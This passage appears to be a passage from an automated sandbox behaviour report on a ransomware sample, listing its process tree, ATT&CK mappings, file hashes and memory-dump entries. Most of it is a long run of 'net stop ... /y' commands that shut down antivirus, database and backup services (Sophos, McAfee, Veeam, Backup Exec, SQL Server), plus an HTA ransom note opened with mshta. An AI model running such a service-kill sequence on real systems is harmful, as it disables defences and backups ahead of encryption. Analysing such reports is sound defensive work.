  "net.exe" stop ekrn /y
  2⤵
  PID:3996
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SQLEXPRESS /y
  2⤵
  PID:3268
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop MSSQL$SQL_2008 /y
  2⤵
  PID:1616
- C:\Windows\System32\mshta.exe
  "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
  2⤵
  - Blocklisted process makes network request
  PID:4416
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop zhudongfangyu /y
  2⤵
  PID:4160
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop YooBackup /y
  2⤵
  PID:4972
- C:\Windows\SYSTEM32\net.exe
  "net.exe" stop BMR Boot Service /y
  2⤵
  PID:2600
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start SSDPSRV /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1324
- C:\Windows\SYSTEM32\net.exe
  "net.exe" start Dnscache /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:404
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config FDResPub start= auto
  2⤵
  PID:1352
- C:\Windows\SYSTEM32\sc.exe
  "sc.exe" config SstpSvc start= disabled
  2⤵
  PID:4652

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BMR Boot Service /y
1⤵
PID:1740

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost
1⤵
PID:4312

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop zhudongfangyu /y
1⤵
PID:2648

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y
1⤵
PID:5260

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
1⤵
PID:10180

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:10608

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop masvc /y
1⤵
PID:11028

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
1⤵
PID:11020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
1⤵
PID:11012

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
1⤵
PID:11004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
1⤵
PID:10996

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:11236

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
1⤵
PID:11584

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
1⤵
PID:12052

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SmcService /y
1⤵
PID:12044

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
1⤵
PID:12036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
1⤵
PID:12028

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
1⤵
PID:12020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
1⤵
PID:13212

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Clean Service” /y
1⤵
PID:13204

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
1⤵
PID:13196

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
1⤵
PID:13188

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
1⤵
PID:13180

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
1⤵
PID:13172

C:\Windows\system32\PING.EXE
ping 127.0.0.7 -n 3
1⤵
- Runs ping.exe
PID:13980

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:13164

C:\Windows\system32\choice.exe
choice /C Y /N /D Y /T 3
1⤵
PID:14008

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
1⤵
PID:13156

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
1⤵
PID:13148

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
1⤵
PID:13124

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
1⤵
PID:13116

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
1⤵
PID:13108

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
1⤵
PID:13100

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
1⤵
PID:13092

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
1⤵
PID:13084

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
1⤵
PID:13076

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:13068

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
1⤵
PID:13060

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop vapiendpoint /y
1⤵
PID:13052

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
1⤵
PID:13036

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
1⤵
PID:13028

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:13020

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfemms /y
1⤵
PID:13012

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
1⤵
PID:13004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
1⤵
PID:12996

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
1⤵
PID:12988

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
1⤵
PID:12980

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
1⤵
PID:12972

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
1⤵
PID:12964

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Symantec System Recovery” /y
1⤵
PID:12940

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Message Router” /y
1⤵
PID:12832

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
1⤵
PID:12788

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:12772

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
1⤵
PID:12764

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
1⤵
PID:12756

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:12748

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
1⤵
PID:12740

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
1⤵
PID:12732

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
1⤵
PID:12724

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:12716

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sophossps /y
1⤵
PID:12708

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
1⤵
PID:12700

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Enterprise Client Service” /y
1⤵
PID:12692

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
1⤵
PID:12684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
1⤵
PID:12676

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ccSetMgr /y
1⤵
PID:12668

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
1⤵
PID:12660

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:12644

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
1⤵
PID:12636

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:12628

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
1⤵
PID:12620

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
1⤵
PID:12612

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:12604

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SamSs /y
1⤵
PID:12596

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
1⤵
PID:12588

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
1⤵
PID:12580

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
1⤵
PID:12572

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
1⤵
PID:12564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
1⤵
PID:12556

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
1⤵
PID:12548

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
1⤵
PID:12540

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Client” /y
1⤵
PID:12532

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “SQL Backups /y
1⤵
PID:12372

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
1⤵
PID:12364

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
1⤵
PID:12356

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop audioendpointbuilder /y
1⤵
PID:12348

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AVP /y
1⤵
PID:12340

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
1⤵
PID:12332

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
1⤵
PID:12324

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop unistoresvc_1af40a /y
1⤵
PID:12316

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
1⤵
PID:12308

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:12300

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:12292

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
1⤵
PID:2940

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
1⤵
PID:1552

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
1⤵
PID:6620

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ARSM /y
1⤵
PID:5160

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:4352

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:4560

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
1⤵
PID:4160

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
1⤵
PID:4564

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
1⤵
PID:4492

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
1⤵
PID:4188

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
1⤵
PID:4720

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop msexchangeimap4 /y
1⤵
PID:4724

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
1⤵
PID:3512

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:4660

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
1⤵
PID:768

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
1⤵
PID:12260

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
1⤵
PID:12012

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mfefire /y
1⤵
PID:12004

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
1⤵
PID:11996

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
1⤵
PID:11864

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
1⤵
PID:11856

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
1⤵
PID:11848

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
1⤵
PID:11840

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
1⤵
PID:11832

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
1⤵
PID:11824

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
1⤵
PID:11816

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
1⤵
PID:11808

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
1⤵
PID:11800

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
1⤵
PID:11576

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVService /y
1⤵
PID:11568

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McShield /y
1⤵
PID:11560

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
1⤵
PID:11552

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
1⤵
PID:11544

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:11536

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
1⤵
PID:11496

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
1⤵
PID:11488

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
1⤵
PID:11480

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
1⤵
PID:11472

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
1⤵
PID:11464

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SntpService /y
1⤵
PID:11456

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
1⤵
PID:11448

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
1⤵
PID:11440

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
1⤵
PID:11424

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
1⤵
PID:11420

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:11408

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
1⤵
PID:11404

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
1⤵
PID:11396

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_update /y
1⤵
PID:11372

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop swi_service /y
1⤵
PID:11356

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
1⤵
PID:11360

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:4436

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
1⤵
PID:11252

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
1⤵
PID:11244

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
1⤵
PID:11228

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
1⤵
PID:11220

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
1⤵
PID:11212

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
1⤵
PID:11204

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
1⤵
PID:11196

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
1⤵
PID:11188

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
1⤵
PID:11180

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
1⤵
PID:10784

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
1⤵
PID:10812

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
1⤵
PID:10796

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
1⤵
PID:10768

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
1⤵
PID:10776

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
1⤵
PID:10760

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:10752

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
1⤵
PID:10744

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
1⤵
PID:10736

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
1⤵
PID:10728

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
1⤵
PID:10720

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:10600

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
1⤵
PID:10592

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
1⤵
PID:10584

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
1⤵
PID:10568

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
1⤵
PID:10560

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
1⤵
PID:10552

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop kavfsslp /y
1⤵
PID:10544

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
1⤵
PID:10536

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
1⤵
PID:10528

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
1⤵
PID:10520

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:10512

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:10504

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
1⤵
PID:4596

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
1⤵
PID:9512

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
1⤵
PID:7148

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
1⤵
PID:8620

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop ekrn /y
1⤵
PID:6032

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub
1⤵
PID:5172

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y
1⤵
PID:5156

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
1⤵
PID:2788

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
1⤵
PID:4188

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start SSDPSRV /y
1⤵
PID:4616

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start Dnscache /y
1⤵
PID:3244

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PRICache\4272278488\927794230.pri

MD5
5b2fe6093e026a89105672de6b687c46

SHA1
be2bb7712c6636164e3fcd4b0e385616f67b6df3

SHA256
5adc389222afaa8c16ece2683729529f84b54bbcf1795156cbb2a3c9a0e49676

SHA512
3ba043db534a1aed9a139a19a311ee40668338c2edc26067113b21c2a71e33269921b31edbda39b6f8ad0d0df6da248c17cea6630422c0efbeaf38c1898885b0

Download Submit
C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta

MD5
2b25621202415cff8817974bd6157e05

SHA1
cae49626311097ac689cdcc5d7374d497e446f9f

SHA256
e5dc421a7a8b7e6be0ef03e346f81fe52db6b5546022ba1292b7c963a96e4805

SHA512
c55084477f064f4b84855d8f4599bf22b470cef1398d531616e32120f5560f0597f49c8924bb6b9488bc6844c7070d1ee20896b6ae5f109362c696edc99a5900

Download Submit
memory/224-131-0x0000000000000000-mapping.dmp

Download
memory/404-134-0x0000000000000000-mapping.dmp

Download
memory/1032-160-0x0000000000000000-mapping.dmp

Download
memory/1168-145-0x0000000000000000-mapping.dmp

Download
memory/1192-164-0x0000000000000000-mapping.dmp

Download
memory/1260-168-0x0000000000000000-mapping.dmp

Download
memory/1324-135-0x0000000000000000-mapping.dmp

Download
memory/1328-162-0x0000000000000000-mapping.dmp

Download
memory/1352-133-0x0000000000000000-mapping.dmp

Download
memory/1512-136-0x0000000000000000-mapping.dmp

Download
memory/1564-174-0x0000000000000000-mapping.dmp

Download
memory/1616-158-0x0000000000000000-mapping.dmp

Download
memory/1672-149-0x0000000000000000-mapping.dmp

Download
memory/1740-159-0x0000000000000000-mapping.dmp

Download
memory/1836-152-0x0000000000000000-mapping.dmp

Download
memory/1848-137-0x0000000000000000-mapping.dmp

Download
memory/1892-177-0x0000000000000000-mapping.dmp

Download
memory/2076-138-0x0000000000000000-mapping.dmp

Download
memory/2192-147-0x0000000000000000-mapping.dmp

Download
memory/2364-139-0x0000000000000000-mapping.dmp

Download
memory/2600-140-0x0000000000000000-mapping.dmp

Download
memory/2648-170-0x0000000000000000-mapping.dmp

Download
memory/2716-141-0x0000000000000000-mapping.dmp

Download
memory/2788-165-0x0000000000000000-mapping.dmp

Download
memory/2796-155-0x0000000000000000-mapping.dmp

Download
memory/2920-173-0x0000000000000000-mapping.dmp

Download
memory/3100-132-0x0000000000000000-mapping.dmp

Download
memory/3244-143-0x0000000000000000-mapping.dmp

Download
memory/3264-123-0x0000000000000000-mapping.dmp

Download
memory/3268-161-0x0000000000000000-mapping.dmp

Download
memory/3292-154-0x0000000000000000-mapping.dmp

Download
memory/3772-119-0x0000000000000000-mapping.dmp

Download
memory/3792-126-0x0000000000000000-mapping.dmp

Download
memory/3824-142-0x0000000000000000-mapping.dmp

Download
memory/3964-171-0x0000000000000000-mapping.dmp

Download
memory/3996-163-0x0000000000000000-mapping.dmp

Download
memory/4016-120-0x0000000000000000-mapping.dmp

Download
memory/4088-118-0x0000000000000000-mapping.dmp

Download
memory/4156-151-0x0000000000000000-mapping.dmp

Download
memory/4160-150-0x0000000000000000-mapping.dmp

Download
memory/4280-144-0x0000000000000000-mapping.dmp

Download
memory/4328-169-0x0000000000000000-mapping.dmp

Download
memory/4416-156-0x0000000000000000-mapping.dmp

Download
memory/4452-121-0x0000000000000000-mapping.dmp

Download
memory/4464-125-0x0000000000000000-mapping.dmp

Download
memory/4468-167-0x0000000000000000-mapping.dmp

Download
memory/4500-122-0x0000000000000000-mapping.dmp

Download
memory/4552-124-0x0000000000000000-mapping.dmp

Download
memory/4568-153-0x0000000000000000-mapping.dmp

Download
memory/4584-127-0x0000000000000000-mapping.dmp

Download
memory/4600-157-0x0000000000000000-mapping.dmp

Download
memory/4616-146-0x0000000000000000-mapping.dmp

Download
memory/4628-176-0x0000000000000000-mapping.dmp

Download
memory/4648-130-0x0000000000000000-mapping.dmp

Download
memory/4652-128-0x0000000000000000-mapping.dmp

Download
memory/4664-166-0x0000000000000000-mapping.dmp

Download
memory/4680-129-0x0000000000000000-mapping.dmp

Download
memory/4700-115-0x0000000000620000-0x0000000000621000-memory.dmp

Filesize
4KB

Download
memory/4700-117-0x000000001B1C0000-0x000000001B1C2000-memory.dmp

Filesize
8KB

Download
memory/4972-148-0x0000000000000000-mapping.dmp

Download
memory/5144-178-0x0000000000000000-mapping.dmp

Download
memory/5156-179-0x0000000000000000-mapping.dmp

Download
memory/5200-180-0x0000000000000000-mapping.dmp

Download
memory/5216-181-0x0000000000000000-mapping.dmp

Download
memory/5260-183-0x0000000000000000-mapping.dmp

Download
memory/5288-184-0x0000000000000000-mapping.dmp

Download